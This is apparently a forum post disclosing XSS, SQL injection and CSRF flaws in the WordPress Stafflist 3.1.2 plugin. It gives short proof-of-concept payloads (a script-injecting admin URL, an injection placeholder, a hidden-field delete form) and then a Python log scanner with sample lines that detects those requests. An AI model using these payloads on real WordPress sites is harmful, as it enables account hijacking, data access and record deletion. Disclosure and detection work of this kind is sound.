0 votes
WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability
by (261 points)

1 Answer

0 votes

WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&search=[SQLI]

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability

POC:

<html>
  <body>
    <form action="http://localhost/wp-admin/admin.php">
      <input type="hidden" name="page" value="stafflist" />
      <input type="hidden" name="remove" value="1" />
      <input type="hidden" name="p" value="1" />
      <input type="hidden" name="s" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

by (261 points)
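
A defender-side check for the three request shapes in the PoCs above, written as an added example that is not part of the original post or the plugin's code. It scans web-server access logs for `page=stafflist` requests with a non-numeric `p`, a `remove` action arriving without a same-site Referer, or quoting characters in `search`. The combined log format, the site host `localhost`, the label names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=stafflist&p=2 HTTP/1.1" '
    '200 512 "http://localhost/wp-admin/admin.php?page=stafflist" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=stafflist&remove=1'
    '&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin.php?page=stafflist&remove=1&p=1&s=1 HTTP/1.1" '
    '200 512 "http://other.example/offer.html" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:03:00 +0000] "GET /wp-admin/admin.php?page=stafflist&search=x%27 HTTP/1.1" '
    '200 512 "http://localhost/wp-admin/admin.php?page=stafflist" "Mozilla/5.0"',
]

# Request line, status, size, then the quoted Referer field.
LINE_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"')

def classify(line, site_host="localhost"):
    """Return heuristic labels for one access-log line; [] means nothing flagged."""
    m = LINE_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("url"))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if not url.path.endswith("/wp-admin/admin.php") or params.get("page") != ["stafflist"]:
        return []
    findings = []
    # p is a page number in the PoC URLs; anything that is not digits is suspect.
    p = params.get("p", [""])[0]
    if p and not re.fullmatch(r"[0-9]+", p):
        findings.append("xss-suspect")
    # A state-changing remove with no Referer or a foreign one fits the CSRF form.
    if "remove" in params and urlsplit(m.group("referer")).hostname != site_host:
        findings.append("csrf-suspect")
    # Quoting or statement characters in search are worth a manual look.
    if any(ch in params.get("search", [""])[0] for ch in "'\"`;"):
        findings.append("sqli-suspect")
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry[:90])
```

These labels are triage hints only: a legitimate search containing an apostrophe will also be flagged, and a missing Referer can come from privacy settings rather than a forged request.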